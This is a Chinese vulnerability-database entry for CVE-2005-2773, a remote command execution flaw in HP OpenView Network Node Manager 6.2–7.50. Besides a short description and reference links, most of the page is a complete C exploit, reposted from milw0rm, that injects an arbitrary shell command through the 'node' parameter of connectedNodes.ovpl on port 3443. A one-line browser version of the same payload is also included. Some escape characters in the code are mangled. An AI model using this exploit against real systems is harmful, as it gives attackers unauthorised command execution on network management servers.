HP OpenView网络节点管理器远程命令执行漏洞

HP OpenView网络节点管理器远程命令执行漏洞

漏洞ID 1109036 漏洞类型 输入验证
发布时间 2005-08-30 更新时间 2005-10-20
图片[1]-HP OpenView网络节点管理器远程命令执行漏洞-安全小百科CVE编号 CVE-2005-2773
图片[2]-HP OpenView网络节点管理器远程命令执行漏洞-安全小百科CNNVD-ID CNNVD-200509-028
漏洞平台 Multiple CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1188
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-028
|漏洞详情
HPOpenView网络节点管理器(OVNNM)是HP公司开发和维护的网络管理系统软件,具有强大的网络节点管理功能。HPOpenViewNetworkNodeManager6.2到7.50版本,OVNNM对用户请求的处理上存在输入验证漏洞,远程攻击者可以通过(1)nodeparametertoconnectedNodes.ovpl,(2)cdpView.ovpl,(3)freeIPaddrs.ovpl,and(4)ecscmg.ovpl中的Shell元字符执行任意的命令。
|漏洞EXP
/*
Web Browser info:
	/OvCgi/connectedNodes.ovpl?node=a|command|
	/str0ke
*/

/*
##################################################################################
# HP OpenView Network Node Manager 6.2, 6.4, 7.01, 7.50 Remote Command Execution #
##################################################################################

Name: HP OV NNM Remote Command Execution Exploit
File: HP_OV_NNM_RCE.c
Description: Exploit
Author: Lympex
Contact:
+ Web: http://l-bytes.net
+ Mail: lympex[at]gmail[dot]com
Date: 30/08/2005
Extra: Compiled with Visual C++ 6.0

############################################################################
#SecurityTracker Alert ID:  1014791                                        #
#SecurityTracker URL:  http://securitytracker.com/id?1014791               #
#CVE Reference:  GENERIC-MAP-NOMATCH                                       #
#Updated:  Aug 25 2005                                                     #
#Original Entry Date:  Aug 25 2005                                         #
#Impact:  Execution of arbitrary code via network, User access via network #
############################################################################

*/

//headers
#include <stdio.h>//In/Out
#include <winsock2.h>//sockets functions
#include <stdlib.h>//memory functions
#include <string.h>//strlen,strcat,strcpy

#pragma comment(lib,"ws2_32.lib") //for compile with dev-c++ link to "libws2_32.lib"

#define Port 3443 //port for connect to HP OV NNM
#define SIZE 2048 //buffer size to receive the data

/*connect host:port*/
SOCKET Conecta(char *Host, short puerto)
{
	/*struct for make the socket*/
	WSADATA wsaData;
	SOCKET Winsock;//listener socket
	/*two structures for connect*/
	struct sockaddr_in Winsock_In;
	struct hostent *Ip;

	/*start the socket*/
	WSAStartup(MAKEWORD(2,2), &wsaData);
	/*make*/
	Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);

	//check socket status
	if(Winsock==INVALID_SOCKET)
	{
		/*exit*/
		WSACleanup();
		return -1;
	}

	/*complete the struct*/
	Ip=gethostbyname(Host);
	Winsock_In.sin_port=htons(puerto);
	Winsock_In.sin_family=AF_INET;
	Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));

	/*connect*/
	if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
	{
		/*end*/
		WSACleanup();
		return -1;
	}

	return Winsock;
}

/*MASTER FUNCTION*/
int main(int argc, char *argv[])
{
	/*the socket*/
	SOCKET sock;
	/*make the evil buffer to send the request*/
	char evil_request[]="GET /OvCgi/connectedNodes.ovpl?node=a| ";
	char evil_request2[]=" |";
	char *evil;
	/*to receive the data*/
	char buf[SIZE];
	unsigned int i;

	printf("n +[ HP OV NNM Remote Command Execution ]+ by Lympex");
    printf("nContact: lympex[at]gmail[dot]com & http://l-bytes.net");
	printf("n-----------------------------------------------------n");

	if(argc!=3)//HP_OV_NNM_RCE <host> <command>
	{
		printf("n[+] Usage: %s <host> <command>",argv[0]);
		printf("nImportant: Do not include x22<x22 and x22>x22 charsn");
		return 0;
	}

	for(i=0;i<strlen(argv[2]);i++)
	{
		if(argv[2][i]=='<' || argv[2][i]=='>')
		{
			printf("n[!] Error - You have included x22<x22 and/or x22>x22 charsn");
			return 1;
		}
	}

	printf("n[+] Connecting  %s:%d...",argv[1],Port);

	/*start the exploit*/
	sock=Conecta(argv[1],Port);//connect
	if(sock==-1)
	{
		printf("Errorn");
		return 1;
	}

	printf("OK");

	/*make the EVIL request*/
	evil=(char *) malloc((strlen(argv[2])+24+12)*sizeof(char));
	strcpy(evil,evil_request);strcat(evil,argv[2]);strcat(evil,evil_request2);strcat(evil,"nn");

	//sends it
	send(sock,evil,strlen(evil),0);

	buf[recv(sock,buf,SIZE,0)]='';

	//show the data
	printf("nn------- [Result] -------nn%sn------- [/Result] -------n",buf);

	WSACleanup();
	LocalFree(buf);
	LocalFree(evil);
	return 0;
}

// milw0rm.com [2005-08-30]
|参考资料

来源:XF
名称:hp-openview-node-manager-command-execution(21999)
链接:http://xforce.iss.net/xforce/xfdb/21999
来源:BID
名称:14662
链接:http://www.securityfocus.com/bid/14662
来源:HP
名称:HPSBMA01224
链接:http://www.securityfocus.com/advisories/9150
来源:SECUNIA
名称:16555
链接:http://secunia.com/advisories/16555/
来源:BUGTRAQ
名称:20050825PortcullisSecurityAdvisory05-014HPOpenviewRemoteCommand
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112499121725662&w;=2

相关推荐: XLight FTP Server Remote Send File Request Denial Of Service Vulnerability

XLight FTP Server Remote Send File Request Denial Of Service Vulnerability 漏洞ID 1098864 漏洞类型 Boundary Condition Error 发布时间 2004-02…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享